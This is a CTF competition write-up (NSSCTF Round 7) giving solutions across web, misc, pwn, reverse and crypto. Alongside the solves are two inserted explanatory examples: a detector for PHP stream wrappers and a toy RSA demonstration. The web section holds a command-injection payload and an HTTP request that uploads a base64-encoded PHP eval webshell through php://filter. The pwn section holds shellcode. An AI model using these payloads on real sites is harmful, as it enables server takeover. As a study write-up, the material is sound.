NSSCTF Round7 WP

Not bad: one solve that was unique in the whole field and one second blood; teammates also took a first blood (KoH) and two second bloods.

Web

F | ez_RCE | Doxxx

action=1'&data=;cat /flag %23'

2 | OoO | Doxxx

POST /Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTf=data://text/plain;base64,V2VsY29tZSB0byBSb3VuZDchISE=&NsScTF=1a&nss[ctfer.vip=1&NSScTf=0337522&nSScTF=1&nSscTF=NSSRound7 HTTP/1.1
Host: 43.143.7.127:28734
Content-Length: 580
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarnwHDEBVmc9Vybv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="NsScTf"

Welcome to Round7!!!
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="file"; filename="%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70"
Content-Type: image/jpeg

aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryarnwHDEBVmc9Vybv--
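A defender-side check for the two stream wrappers that appear in the request above (php://filter in a percent-encoded upload filename, data:// in a query parameter), written as an added example; it is not code from the write-up. The prefix list, the regex and the field layout are assumptions of the example, and the sample fields are constructed from the values visible in the request. The point it makes: the filename is percent-encoded, so a check on the raw value never sees "php://" and the input has to be decoded before matching.

```python
import re
from urllib.parse import unquote

# Stream-wrapper prefixes to flag in user-controlled file names or parameters.
# php://filter and data:// are the two seen in the request above; the list
# itself is an assumption for this example and should be tuned per deployment.
WRAPPER_PREFIXES = ("php://", "data:", "phar://")

# Filter name whose presence turns a harmless-looking upload name into code.
FILTER_RE = re.compile(r"convert\.base64-decode", re.IGNORECASE)


def fully_unquote(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the value stops changing.

    The upload filename above is percent-encoded once; a check on the raw
    value would only see %70%68%70... and never match 'php://'.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> list:
    """Return a list of findings for one user-controlled string."""
    findings = []
    decoded = fully_unquote(value).strip().lower()
    for prefix in WRAPPER_PREFIXES:
        if decoded.startswith(prefix):
            findings.append(f"stream wrapper {prefix}")
    if FILTER_RE.search(decoded):
        findings.append("php filter convert.base64-decode")
    return findings


def scan_request_fields(fields: dict) -> dict:
    """Check every field name/value pair; return {field: findings} for hits."""
    hits = {}
    for name, value in fields.items():
        found = classify_value(value)
        if found:
            hits[name] = found
    return hits


# Constructed sample: the two wrapper-bearing values from the request above
# plus a benign upload name, laid out as the fields a server-side hook would see.
SAMPLE_FIELDS = {
    "file.filename": "%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74"
                     "%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f"
                     "%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70",
    "NsScTf": "data://text/plain;base64,V2VsY29tZSB0byBSb3VuZDchISE=",
    "avatar.filename": "holiday.jpg",
}

if __name__ == "__main__":
    for field, findings in scan_request_fields(SAMPLE_FIELDS).items():
        print(field, "->", ", ".join(findings))
```

Run it and the upload filename reports both the wrapper and the base64-decode filter, the query parameter reports data:, and the ordinary jpg name is clean.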

Misc

1 | brokenFilterChain | App1e_Tree

Just read the documentation carefully. In practice we need to parse the forty-odd lines here; each line represents one character.

https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT has the strings that correspond to each character. After converting, reverse the string (the documentation mentions this too) and base64-decode it.

NssssCTFeyAgphhpRmlsdGVyQ2hhMW5fW4sS0FunICB9GyQp

The trailing W4sS0Fun does not need base64 decoding; piece it together and the flag comes out. I think it was the one below, I don't remember exactly.

NssssCTF{phhpFilterCha1n_W4sS0Fun}

First blood, and the only solve in the whole field.

2 | Ikun的电脑 | App1e_Tree

Pulling out the useful parts.

There is an audio clip at 1.5; it has noise at the start, and zoomed in it is a sequence of 0s and 1s.

Put it alone on one channel, Tools -> Sample Data Export, fill in 0/1 according to whether each sample is positive or negative; checking the result, it is a zip.

Brute-forced the password with Passware; that gives the password for the zip inside 1.12.

The resulting image is as follows.

The image is 3500*3500, 35*35 tiles in total, each representing 0 or 1. Extract the two 100*100 tile images; I used ImageMagick Display for this.

Then find the pixels that differ between the two tile images and compare against them; a short script does it.
exp:

from PIL import Image

# reference tiles for the two symbols (extracted with ImageMagick Display)
right = Image.open('1.png')
left = Image.open('2.png')
r = right.getpixel((50, 50))
l = left.getpixel((50, 50))

# flag.png is 3500x3500: 35x35 tiles of 100x100 px, each encoding 0 or 1
img = Image.open('flag.png')
res = Image.new('RGB', (35, 35))
for x in range(35):
    for y in range(35):
        # one sample pixel per tile; the -50 offset shifts the grid by one
        # tile (Pillow wraps negative coordinates), which does not stop scanning
        orix = 100*x - 50
        oriy = 100*y - 50
        p = img.getpixel((orix, oriy))
        if p == r:
            res.putpixel((x, y), (255, 255, 255))
        else:
            res.putpixel((x, y), (0, 0, 0))
res.save('haha.png')

Then just scan it.

Pwn

1 | 奇你太美 | emmm

Jump back and read the shellcode once more. strncpy is a bit of a trap: if src is 0 it wipes the whole 0x10000 region, so I changed rbp instead and let the program copy the shellcode once more by itself and execute it.
exp:

from pwn import *


context.arch = 'amd64'


# stage 1: adjust rbp and return so the program copies the shellcode again
# (see the note above)
shellcode = '''
mov edi,0x01033103
xor edi,0x01011101

shr edi,1
push rdi
pop rbp

add edi,-0x211

mov [edi],edi
mov eax,[edi]

pop rbx
mov bl,75
push rbx

ret
'''

# stage 2: open nss.txt and write to it
write_txt = '''
/*open */
xor rax,rax

mov edi,edx
mov dil,36              /*/nss.txt*/

push 0x41
pop rsi

shr edx,8
mov dl, 0xff
mov al,0x2
syscall

/*write txt*/
mov esi,edi
mov sil,30
mov edi,eax

mov al,1
syscall
'''


payload = asm(shellcode) + b'\x00'
print(len(asm(write_txt)))

payload2 = asm(write_txt) + b'nss666/nss.txt\x00'

#exit(0)


# dump the stage-1 bytes for inspection
for i in range(len(payload)):
    # if payload[i] & 1 == 0:
    #     assert(False)
    print('%d' % payload[i])

with open('shellcode', 'wb') as f:
    f.write(payload)
    f.write(payload2)

Re

2 | Tetris | emmm

Just patch the memory directly with CE.

Crypto

F | 裁雨留虹 | App1e_Tree

The low 151 bits of q are disturbed by noise data, and the high bits of p and q satisfy that their sum is all ones in binary. The smaller p-q is, the larger the product, so start with p all ones and q all zeros and keep adjusting to get the high 512-151 bits of q, then use Coppersmith to solve for the low bits.
exp:

from Crypto.Util.number import *
import gmpy2
n=9917194039107056112184040918942991087006948095942990759083653963386347099537872574166056046291870369660144747910297948865119742599237172372299988293988091347394105128159638670279156137176691709760735170161276067729520093855522898374683007605621773716069049053067108582990968946937131419271617984877669716809
e=65537
c=7587789694070748707348883888501708440754567305328311759140303893816709636596826176623331039561461438614968853491941771170730448862622628116994823624292597456598154540152890431881836541630974352792727975698270205577342357896211852053562431611816629189278379946359321494584849773739040563488839129619217040844

# Sage: ^^ is xor. Bits 151..511 of p start all ones and q all zeros;
# move one bit at a time from p to q while the product stays below n
p=((1<<512)-1)^^((1<<151)-1)
q=0
for i in range(510,150,-1):
    bit=1<<i
    if (p^^bit)*(q^^bit)<n:
        p^^=bit
        q^^=bit

# Coppersmith for the unknown low bits of p, widening the unknown window
P.<x>=PolynomialRing(Zmod(n))
for i in range(150,230):
    f=x+ZZ(((p>>i)<<i))
    root=f.small_roots(X=2^i,beta=0.4)
    if root!=[]:
        p=root[0]+ZZ(((p>>i)<<i))
        break

q=ZZ(n)//ZZ(p)
phi=ZZ((p-1)*(q-1))
d=gmpy2.invert(e,phi)
flag=ZZ(pow(c,d,n))
print(long_to_bytes(flag))
#NSSCTF{e75a2dbf-8581-49bf-a125-383cca7fd377}
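To show why this prime structure leaks, here is an added example (not the write-up's code, and pure Python rather than Sage) that builds a small constructed key pair with the same property, where above the noise boundary exactly one of p and q has each bit set, and runs the greedy bit-moving step described above against it. The toy sizes (64-bit primes, 12 noise bits), the seeds, and the rule that the top two bits of p are 1 are assumptions of the example; the Coppersmith step needs Sage's small_roots and is not reproduced.

```python
import random

# Deterministic Miller-Rabin bases: exact for every n < 3.3e24, so the
# 64-bit toy primes below are certified rather than merely probable.
MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n: int) -> bool:
    if n < 2:
        return False
    for b in MR_BASES:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def make_instance(bits: int, noise: int, seed: int):
    """Constructed key pair with the challenge's structure: for every bit
    position >= noise exactly one of p, q has the bit set, so the high parts
    sum to S = 2^bits - 2^noise; the low `noise` bits are independent.
    The top two bits of p are forced to 1 so that p - q is large
    (an assumption of this example; see the note after the block)."""
    rng = random.Random(seed)
    S = (1 << bits) - (1 << noise)
    while True:
        P = (3 << (bits - 2)) | (rng.getrandbits(bits - 2 - noise) << noise)
        Q = S - P                      # bitwise complement of P above `noise`
        p = P | rng.getrandbits(noise) | 1
        q = Q | rng.getrandbits(noise) | 1
        if is_prime(p) and is_prime(q):
            return p, q


def recover_high_bits(n: int, bits: int, noise: int):
    """Greedy recovery of the high parts, the step the write-up describes:
    start with p all ones and q all zeros above `noise`, then move one bit
    at a time from p to q (keeping p + q = S) whenever the product stays
    below n. With p + q fixed, the product grows as p - q shrinks, so a bit
    that keeps p*q < n belongs to q."""
    P = ((1 << bits) - 1) ^ ((1 << noise) - 1)
    Q = 0
    for i in range(bits - 2, noise - 1, -1):
        bit = 1 << i
        if (P ^ bit) * (Q ^ bit) < n:
            P ^= bit
            Q ^= bit
    return P, Q


def high_part_error(p: int, P_rec: int) -> int:
    """Absolute distance between the true p and its recovered high part."""
    return abs(p - P_rec)


if __name__ == "__main__":
    bits, noise = 64, 12
    for seed in range(3):
        p, q = make_instance(bits, noise, seed)
        P_rec, Q_rec = recover_high_bits(p * q, bits, noise)
        err = high_part_error(p, P_rec)
        print(f"seed {seed}: error < 2^{err.bit_length()} (noise boundary 2^{noise})")
```

The recovered high part lands within a few bits of the noise boundary rather than exactly on it, because the unknown low bits of both primes perturb n; the error grows as p and q get closer together. That is why the solve above tries Coppersmith with unknown-bit windows from 150 up to 230 instead of exactly 151.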

织诗成锦

See my other post:
https://www.cnblogs.com/App1eTree/#/c/subject/p/17077107.html

posted @ 2023-01-28 16:35 App1e_Tree